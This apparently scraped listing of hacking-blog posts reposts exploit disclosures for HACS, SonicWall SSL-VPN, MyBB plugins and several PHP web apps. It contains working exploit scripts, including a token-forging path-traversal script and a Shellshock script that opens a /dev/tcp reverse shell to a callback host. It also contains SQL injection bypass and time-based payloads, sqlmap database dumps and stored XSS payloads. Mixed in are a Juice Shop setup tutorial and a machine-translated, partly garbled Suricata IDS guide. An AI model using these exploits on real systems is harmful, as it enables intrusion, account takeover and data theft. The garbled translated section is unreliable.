    # Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover # Date: 2021-01-28 # Exploit Author: Lyghtnox # Vendor Homepage: https://www.home-assistant.io/ # Software Link: https://github.com/hacs/integration # Version: < 1.10.0 # Tested on: Raspbian + Home Assistant 2021.1.0 # Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/ # STEP 1: Run the exploit (python3 exploit.py host port) # STEP 2: Copy the token printed and set in your browser's local storage with # the key `hassTokens` import requests import jwt import json import argparse class HA: def __init__(self, ip, port): self.ip = ip self.port = port def retrieveFile(self, f): url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}' with requests.Session() as s: r = requests.Request(method='GET', url=url) prep = r.prepare() prep.url = url try: r = s.send(prep, verify=False) except requests.exceptions.ConnectionError: return if r.status_code == 400 or r.status_code == 404: return return r def craftToken(self): f = self.retrieveFile('.storage/auth').json() # Find owner for user in f['data']['users']: if user['is_owner']: self.owner = user['id'] break else: print("No owner found. Using first account") self.owner = f['data']['users'][0]['id'] for token in f['data']['refresh_tokens']: if self.owner == token['user_id']: encoded_jwt = jwt.encode({'iss': token['id']}, token['jwt_key'], algorithm="HS256") self.token = {'access_token': encoded_jwt, 'token_type': 'Bearer', 'refresh_token': token['token'], 'expires_in': 1800, 'hassUrl': f"http://{self.ip}:{self.port}", 'clientId': token['client_id']} return self.token if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit a vulnerability in \ HACS < 1.10.0 to gain admin access to an Home Assistant instance.") parser.add_argument("host", type=str, help="IP of the HASS instance") parser.add_argument("port", type=int, help="port of the HASS instance") args = parser.parse_args() r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format( ip=args.host, port=args.port)) if r.status_code != 404: print("HACS found! Testing vulnerability...", end='', flush=True) ha = HA(args.host, args.port) if ha.retrieveFile('configuration.yaml'): print(": VULNERABLE") token = ha.craftToken() if token: print(f"Use the following 'hassTokens': {json.dumps(token)}") else: print("Unable to craft token") else: print(": Not vulnerable")
  16. HireHackking

    MyBB Hide Thread Content Plugin 1.0 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure # Date: 1/27/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://community.mybb.com/mods.php?action=view&pid=1430 # Version: 1.0 # Tested on: Windows 10 # CVE: CVE-2021-3337 1. Description: This plugin hides thread content until user replies to the thread. The information disclosure is hidden content can be viewed without replying. 2. Proof of Concept: - Visit a post where content is hidden - Click the reply or quote button below Thread content will be displayed in the [quote] bracket without needing to reply
  17. HireHackking

    Title: Kali installs Owasp juice shop (I)

    HireHackking posted a blog entry in Hacker Technology
    This vulnerability range was developed by Owasp and contains the top ten vulnerabilities of Owasp, with a total of 47 levels, and the difficulty varies. Owasp juice shop can also be understood as a hacker game! This article mainly tells you about the deployment of the Owasp juice shop environment. Environment kali2022docker What is docker Docker is an open source application container engine based on the Go language and is open sourced according to the Apache2.0 protocol. Docker allows developers to package their applications and dependencies into a lightweight, portable container and publish them to any popular Linux machine, or virtualize them. Containers use sandboxing mechanism completely, and there will be no interface between them (similar to iPhone apps). More importantly, the container performance overhead is extremely low. The system resources are relatively low. Installing docker Installing docker in kali is very simple. We only need to execute the following commands. apt-get update apt-get install docker Use docker to install owap juice shop Execute the following command: docker pull bkimminich/juice-shop uses docker to pull the owasp image and run it directly in docker. This directly omits the deployment of the environment! Run docker run -d -p 3000:3000 bkimminich/juice-shop At this time, we only need to access kaliip:3000 in the browser. The slight test As a ancestral grandfather, I was confused when I opened the owasp juice shop. What the hell is this? I can't understand this shooting range. By reviewing the elements, we see the following code Can I saw a page with a scoreboard with the link #score-board. We visit this page. From then on, I started the first step to becoming a big Heikuo!
  18. HireHackking

    Simple Public Chat Room 1.0 - Authentication Bypass SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 POST /chat/login.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 51 Connection: close Referer: http://localhost/chat/index.php?attempt= Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl Upgrade-Insecure-Requests: 1 username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--
  19. HireHackking

    SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated) # Exploit Author: Darren Martyn # Vendor Homepage: https://www.home-assistant.io/ # Version: < SMA 8.0.0.4 # Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ #!/usr/bin/python # coding: utf-8 # Author: Darren Martyn # Credit: Phineas Fisher # Notes: # This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team # and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command # execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns # a trivial reverse shell using /dev/tcp. # There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but # implementing that is left as an exercise for the reader. I've seen a few approaches, and # would be interested in seeing yours. # There is another LPE that works only on some models which I also have removed from this. # Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ import requests import sys import telnetlib import socket from threading import Thread from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import time def banner(): print """ 88 88 "" 88 88 8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 `8b d8' 88 I8[ "" 88 88 "" `Y8 88 `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 88 88 88 ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, a8" `Y88 a8" "8a a8" "8a 88P' "Y8 8b 88 8b d8 8b d8 88 "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88 SonicWall SSL-VPN Appliance Remote Exploit Public Release (Jan 2021). Author: Darren Martyn. Credit goes to Phineas Fisher for this. Stay inside, do crimes. """ def handler(lp): # handler borrowed from Stephen Seeley. print "(+) starting handler on port %d" %(lp) t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" %(addr[0]) t.sock = conn print "(+) pop thy shell!" t.interact() def execute_command(target, command): url = target + "/cgi-bin/jarrewrite.sh" headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} r = requests.get(url=url, headers=headers, verify=False) return r.text def check_exploitable(target): print "(+) Testing %s for pwnability..." %(target) output = execute_command(target=target, command="cat /etc/passwd") if "root:" in output: print "(*) We can continue, time to wreck this shit." return True else: return False def pop_reverse_shell(target, cb_host, cb_port): print "(+) Sending callback to %s:%s" %(cb_host, cb_port) backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port) execute_command(target=target, command=backconnect) def hack_the_planet(target, cb_host, cb_port): if check_exploitable(target) == True: pass else: sys.exit("(-) Target not exploitable...") handlerthr = Thread(target=handler, args=(int(cb_port),)) handlerthr.start() pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port) def main(args): banner() if len(args) != 4: sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0])) hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3]) if __name__ == "__main__": main(args=sys.argv)
  20. HireHackking

    Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Replicates across chat sessions.. POST /chat/send_message.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 58 Origin: http://localhost Connection: close Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1
  21. HireHackking

    Zoo Management System 1.0 - 'anid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ # Version: V1 # Tested on: Windows # Identify the vulnerability 1- go to http://localhost/animals.php and click on an animal 2- then add the following payload to the url payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh If the web server makes you wait 5 seconds then it's vulnerable # Exploit Now you can exploit it using sqlmap command: sqlmap -u url --dbs example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs ___ __H__ ___ ___[.]_____ ___ ___ {1.4.10.16#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:05:33 /2021-01-29/ [23:05:34] [INFO] resuming back-end DBMS 'mysql' [23:05:34] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n] y sqlmap resumed the following injection point(s) from stored session: --- Parameter: anid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: anid=9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL-- - --- [23:05:36] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.3.10, PHP back-end DBMS: MySQL >= 5.0.12 [23:05:36] [INFO] fetching database names available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] sys [*] umspsdb [*] zmsdb [23:05:36] [INFO] fetched data logged to text files under
  22. HireHackking

    MyBB Delete Account Plugin 1.4 - Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting # Date: 1/25/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/ # Version: 1.4 # Tested on: Windows 10 1. Description: This plugin allows users to delete their account. Giving a reason for deleting your account is vulnerable to XSS. 2. Proof of Concept: - Go to User CP -> Delete Account - Input a payload for delete account reason <script>alert('XSS')</script> Payload will execute here.. admin/index.php?module=user-deleteaccount
  23. HireHackking

    タイトル:SELKSシステムオープンソース侵入検知システムの構造

    HireHackking posted a blog entry in Hacker Technology
    1。システム環境構成 システム環境:CENTOS7X64 IPアドレス:172.16.91.130 1。静的IPアドレスを設定します [root@localhost backlion] #vi/etc/sysconfig/network-scripts/ifcfg-* bootproto=static #dhcp to static(modify) onboot=はい#この構成は、通常は最後の行で電源を入れるときにenableです(変更) iPaddr=172.16.91.130 #Static IP(追加) ゲートウェイ=172.168.91.1 #Default Gateway、仮想マシンがインストールされている場合、通常は2、つまりVMNET8のゲートウェイ設定(追加)です。 netmask=255.255.255.0 #subnetマスク(追加) DNS1=172.16.95.70 #DNS構成。仮想マシンをインストールする場合、DNSのみがゲートウェイです。複数のDNS URLを追加する場合は、それらを追加します(追加) [root@localhost〜]#/etc/init.d/network再起動 DNS:をセットアップします vim /etc/resolv.conf nameserver=114.114.114.114 nameserver=8.8.8.8 2。ホスト名を設定 [root@localhost network-scripts] Vim /etc /hosts最後に、IPとホスト名のバインディングを追加します 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 :1 localhost localhost.localdomain localhost6 localhost6.localdomain6 172.16.91.121 elk-server.com elk#最後の1つはホスト名のエイリアスです。イントラネット名ドメイン名:パブリック名ホスト名は、イントラネットのDNSに相当するローカルホストのホスト名ではありません。 3。ファイアウォールをオフにします [root@selks-server〜]#cat /etc/selinux/config #このファイルはの状態を制御します システム上のselinux。 #selinux=これらのいずれかを取得できます 3つの値: #enforcing -selinuxセキュリティ ポリシーが実施されます。 #permissive -selinuxプリント 強制する代わりに警告。 #Disabled- SELINUXポリシーはありません ロード。 selinux=disabled #SELINUXTYPE=の1つを取ることができます 3つの値: #targeted-ターゲットプロセス 保護されています、 #minimum-の変更 ターゲットポリシー。選択されたプロセスのみが保護されています。 #MLS-マルチレベルのセキュリティ 保護。 selinuxType=ターゲット または [root@localhost〜]#sed -i 7s/endforcing/disabled//etc/selinux/config 閉じるファイアウォール: [root@selks-server〜]#systemctl firewalld.service #stop firewallを停止します [root@selks-server〜] [root@localhost〜] #systemctl List-Unit-Files | Grep Firewalld#ファイアウォールがランダムに開始されるかどうかを確認します 4。 wget をインストールします [root@selks-server〜]#yumインストールwget –y 5。 Yumソースを交換 Alibabaクラウドソースに置き換え、システムを更新してソフトウェアをすばやくダウンロードする4 [root@selks-server〜]#yum WGETをインストールします [root@selks-server〜]#mv /etc/yum.repos.d/centos-base.repo /etc/yum.repos.d/centos-base.repo.backup [root@selks -server〜]#wget -o /etc/yum.repos.d/centos-base.repo http://mirrors.aliyun.com/repo/centos-7.repo [root@selks-server〜]#yum cleanすべて [root@selks-server〜]#yum makecache 6.システムを挿入 [root@selks-server〜]#yum -y アップデート 7。 Epelソースを取り付けます [root@selks-serverルール]#yum -y Epel-Releaseをインストールします 8。時間同期 [root@localhost yum.repos.d]#yum -Yインストールntp ntpdate #install ntp time同期関連ソフトウェアパッケージ [root@localhost yum.repos.d] #cat /etc/ntp.conf #confirm構成ファイルに次の時間同期ソースがあること サーバー0.rhel.pool.ntp.org iburst サーバー1.Rhel.pool.ntp.org iburst サーバー2.Rhel.pool.ntp.org Iburst サーバー3.Rhel.pool.ntp.org iburst [root@localhost yum.repos.d]#systemctl enable ntpd #set ntpdでntpdを自動的に開始する [root@localhost yum.repos.d]#SystemCtl NTPD #Start NTPDサービスを今すぐ開始してください [root@localhost yum.repos.d]# CP /usr/share/ゾーンインフェ/アジア/上海/etc/localtime [root@localhost yum.repos.d]#日付#時間が現在の時刻と一致していることを確認してください 9.ルートを追加します 使用法:route add -net | -host dest gw Nexthop ルート追加-NET 10.0.0.0/8 GW 192.168.10.1 #ADDルート ルート追加デフォルトGW 192.168.10.1 #ADDデフォルトルート ネットワークカードに関するルートを永続的に追加/削除:/etc/etc/network-scripts/route-interface_name vim /etc/network-scripts/route-eth0 address0=222.16.60.148 NetMask0=255.255.255.0 Nexthop0=222.16.60.254 アドレス1=222.16.60.214 NetMask1=255.255.255.0 Nexthop1=222.16.60.254 2。 Suricata をインストールします 1。依存関係パッケージ[root@selks-server〜]#yumをインストールします wget libpcap-devel libnet-devel pcre-devel gcc-c ++ automake autoconfをインストールします libtoolは、libyaml-devel zlib-devel file-devel jansson-devel nss-develを作ります 2。Suricata http://Suricata-Ids.org/download/の最新のインストールパッケージをダウンロードしてください(2018年6月14日現在、最新バージョンは4.0.4) [Root@Selks-Server〜] [root@selks-server〜]#tar zxvf Suricata-4.0.4.tar.gz [root@selks-server〜]#CD Suricata-4.0.4 3. [root@selks-server〜]#。/configureをコンパイルしてインストールします Make Make install-full 知らせ: デフォルトでは、利用可能なコミュニティルールセットスナップショットは、http://rules.emergingthreats/communityからダウンロードされ、/usr/local/etc/suricata/rulesディレクトリに保存されます。 Suricata構成ファイルへのパスは次のとおりです。 /usr/local/etc/suricata/suricata.yaml 4. Suricataを構成する場合:Suricataは、どのポートを使用してもHTTPトラフィックを自動的に検出できることに注意してください。したがって、http_ports変数を正しく指定することはあまり重要ではありません。コマンドは次のとおりです。 [root@selks-server〜]#vim /usr/local/etc/suricata/suricata.yaml #suricataの構成ファイルは、デフォルトでは/etc/suricata/suricata.yamlにあります。開始する前に、いくつかの重要な変数を構成する必要があります。そのうち、変数は2つのグループに分割されます。1つはアドレスグループ、もう1つはポートグループです。サンプル構成ファイルは次のとおりです 注: home_netが設定されている場合、external_netが設定されています! home_netが設定されている場合、エラーが報告されます。 home_netがイントラネットアドレスを設定している場合、external_netはに設定されています! $ home_netの場合、イントラネット間の一部のアラームは一致できません address-groups: #configureアドレスグループ home_net: '[192.168.0.0/16,10.0.0.0/8,172.16.0.0/12]' #Suricataがチェックするネットワークを指定します #HOME_NET: '[192.168.0.0/16]' #HOME_NET: '[10.0.0.0/8]' #HOME_NET: '[172.16.0.0/12]' #HOME_NET: 'ANY' #external_net: '!$ home_net' external_net: '任意の'#ローカルエリアの外側の他のネットワークアドレスをセットします http_servers: '$ home_net' smtp_servers: '$ home_net' sql_servers: '$ home_net' dns_servers: '$ home_net' telnet_servers: '$ home_net' aim_servers: '$ extenult_net' dnp3_server: '$ home_net' dnp3_client: '$ home_net' modbus_client: '$ home_net' modbus_server: '$ home_net' enip_client: '$ home_net' enip_server: '$ home_net' ポートグループ: http_ports: '80'#異なるサービスで使用されるポート番号を識別する shellcode_ports: '!80' oracle_ports: 1521 SSH_PORTS: 22 DNP3_PORTS: 20000 modbus_ports: 502 file_data_ports: '[$ http_ports、110,143]」 FTP_PORTS: 21 ## ステップ2:有効または無効にするルールを選択します ## Default-Rule-Path: /usr/local/etc/suricata/rules#デフォルトのルールライブラリパスアドレスをセットします Rule-Files: -botcc.rules # - botcc.portgrouped.rules -ciarmy.rules - 妥協した -drop.rules -dshield.rules # -Elging-Activex.rules -Elging-Attack_response.rules -Emerging-chat.rules -egling-current_events.rules -Emerging-dns.rules -Emerging-dos.rules -Elging-Exploit.rules -Emerging-ftp.rules # -Emerging-Games.rules # -Emerging-ICMP_INFO.RULES # -ICMP.rules -Emerging-imap.rules # - 新たに不適切な # -ingeling-info.rules -mallware.rules -mewing-misc.rules -moving-mobile_malware.rules -Nemuling-netbios.rules -Emerging-P2P.rules -Emerging-Policy.rules -Emerging-Pop3.rules -Emerging-RPC.rules # -Emerging-Scada.rules # -Emerging-Scada_special.rules -Emerging-Scan.rules # -Elging-ShellCode.rules - 新興smtp.rules -Emerging-Snmp.rules -Emerging-SQL.rules -egling-telnet.rules -Emerging-TFTP.rules -Emerging-Trojan.rules -egling-user_agents.rules -Emerging-voip.rules -WEB_CLIENT.RULES EMERGING-WEB_CLIENT.RULES -WEB_SERVER.RULES EMERGING-WEB_SERVER.RULES # -WEB_SPICIFIFIC_APPS.RULES -Worm.rules -tor.rules # -decoder-events.rules#ルールdirの下でスリカータソースで利用可能 # -Stream-Events.rules#が入手可能 ルール監督に基づくスリカータソース -http-events.rules#ルールの下でSuricataソースで利用可能 監督 -SMTP-Events.rules#は、ルールに基づくSuricataソースで利用可能です 監督 -DNS-Events.rules#は、Suricataのソースで利用可能です ルール監督 -TLS-EVENTS.RULES#は、Suricataのソースで利用可能です ルール監督 # -modbus-events.rules#が入手可能 ルール監督に基づくスリカータソース # -App-Layer-events.rules#が入手可能 ルール監督に基づくスリカータソース # -DNP3-EVENTS.RULES#が利用可能です ルール監督に基づくスリカータソース # -NTP-Events.rules#が入手可能 ルール監督に基づくスリカータソース 分類-File: /usr/local/etc/suricata/classification.config Reference-config-file: /usr/local/etc/suricata/reference.config しきい値file: /usr/local/etc/suricata/threshold.config ## ##ステップ3:出力を選択します 有効にする ## タイプ: -Alert: #payload: yes#base64でペイロードのダンプを有効にします Payload-Buffer-Size: 6kb#max イブログペイラードサイズの制限で出力するペイロードバッファーのサイズ Payload-Printable:はい#プリント可能にペイロードのダンプを有効にします (損失)フォーマット元のペイロードを記録します #packet:はい#パケットのダンプを有効にします (ストリームセグメントなし) #http-body: yes#httpボディのダンプを有効にする base64 http-body-printable: yes#dumping of 印刷可能な形式のHTTPボディは、httpオリジナルサウンドを記録します Metadata:はい#L7/Applayerフィールド、Flowbitを追加します アラートへの他のVAR #パターンマッチャーバッファと できるだけ多くのパケットを並行してスキャンします。Max-Pending-Packets: 1024#Suricataが同時に1と同時に処理できるパケットの数をセットし、最大値はメモリのサイズに依存します。メモリが大きくなると、より大きな値を設定し、パフォーマンスが向上する可能性があります。デフォルト値は1024です オペレーティングシステムネットワークスタック自身の動作を防ぐために使用されるよく知られている攻撃方法のいくつか(たとえば、TCP再組み立て)。対策として、Modern IDCは、ターゲットオペレーティングシステムの検出エンジンアルゴリズムを微調整することにより、「ターゲットベースの」検出手段を提供します。したがって、ホストがどのオペレーティングシステムを実行しているかを知っている場合、この情報をSuricataに提供すると、検出の成功率を大幅に改善できます。これがHost-Os-Policyの存在です。この例では、デフォルトのIDCポリシーはLinuxシステムです。 IPアドレスにオペレーティングシステム情報が指定されていない場合、SuricataはデフォルトでLinuxベースの検出ポリシーを適用します。次のように、192.168.122.0/28および192.168.122.155への通信がキャプチャされると、SuricataはWindowsベースの検出ポリシーを適用します。 host-os-policy: #デフォルトのポリシーウィンドウを作成します。 Windows: [10.22.0.0/24] BSD: [] bsd-right: [] old-linux: [] Linux: [0.0.0.0/0,10.22.0.188] Old-Solaris: [] solaris: [] hpux10: [] hpux11: [] irix: [] macos: [] Vista: [] Windows2k3: [] 5。ネットワークカードLGO/GRO機能をオフにします(ネットワークカード名は実際の実際のものと組み合わせて変更されます)[root@selks -server〜]#ethtool -k ens32 gro off lro off 変更できません 大規模なオフロード(ネットワークカードがLRO/GRO機能をサポートしていないことを意味します。 6.利用可能なすべての操作モード[root@selks-server〜]#/usr/local/bin/suricataを確認してください -List-Runmodes
  24. HireHackking

    User Management System 1.0 - 'uid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: User Management System 1.0 - 'uid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/user-management-system-in-php-using-stored-procedure/ # Version: V1 # Tested on: Windows # Identify the vulnerability 1- go to http://localhost/admin/ and login with your account 2- then go to http://localhost/admin/registered-users.php 3- Click edit on any user and then add the following payload to the url payload: AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT) url: http://localhost/ums-sp/admin/edit-user-profile.php?uid=3%20AND%20(SELECT%205008%20FROM%20(SELECT(SLEEP(5)))zVHT) If the web server makes you wait 5 seconds then it's vulnerable # Exploit Now you can exploit it using sqlmap command: sqlmap -u url --cookies="cookies here" --dbs example: sqlmap -u http://localhost/admin/edit-user-profile.php?uid=3 --cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs ___ __H__ ___ ___[,]_____ ___ ___ {1.4.10.16#dev} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 22:55:16 /2021-01-29/ [22:55:16] [INFO] resuming back-end DBMS 'mysql' [22:55:16] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: uid (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: uid=(SELECT (CASE WHEN (7929=7929) THEN 3 ELSE (SELECT 1849 UNION SELECT 3460) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uid=3 AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT) --- [22:55:16] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.3.10 back-end DBMS: MySQL >= 5.0.12 [22:55:16] [INFO] fetching database names [22:55:16] [INFO] fetching number of databases [22:55:16] [INFO] resumed: 6 [22:55:16] [INFO] resumed: mysql [22:55:16] [INFO] resumed: information_schema [22:55:16] [INFO] resumed: performance_schema [22:55:16] [INFO] resumed: sys [22:55:16] [INFO] resumed: umspsdb [22:55:16] [INFO] resumed: zmsdb available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] sys [*] umspsdb [*] zmsdb [22:55:16] [INFO] fetched data logged to text files under
  25. HireHackking

    Park Ticketing Management System 1.0 - 'viewid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/ # Version: V1 # Tested on: Windows # Identify the vulnerability 1- go to http://localhost/index.php and login with your account 2- then go to http://localhost/manage-normal-ticket.php 3- Click view on any ticket. then add the following payload to the url payload: ' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH url: http://localhost/view-normal-ticket.php?viewid=1%27%20AND%20(SELECT%208292%20FROM%20(SELECT(SLEEP(5)))XIQB)%20AND%20%27QCDH%27=%27QCDH If the web server makes you wait 5 seconds then it's vulnerable # Exploit Now you can exploit it using sqlmap command: sqlmap -u url --cookies="cookies here" --dbs example: sqlmap -u http://localhost/view-normal-ticket.php?viewid=1 --cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs ___ __H__ ___ ___[)]_____ ___ ___ {1.4.10.16#dev} |_ -| . [)] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:19:33 /2021-01-29/ [23:19:34] [INFO] resuming back-end DBMS 'mysql' [23:19:34] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: viewid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: viewid=1' AND 5743=5743 AND 'wcUF'='wcUF Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: viewid=1' AND (SELECT 8292 FROM (SELECT(SLEEP(5)))XIQB) AND 'QCDH'='QCDH Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: viewid=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767a71,0x6f5367494d7573444b726d466e617a77735574536d49466a654d6569746b4972745556686a4e4548,0x716a767671),NULL,NULL,NULL-- - --- [23:19:34] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.3.10 back-end DBMS: MySQL >= 5.0.12 [23:19:34] [INFO] fetching database names available databases [8]: [*] detsdb [*] information_schema [*] mysql [*] performance_schema [*] ptmsdb [*] sys [*] umspsdb [*] zmsdb [23:19:34] [INFO] fetched data logged to text files under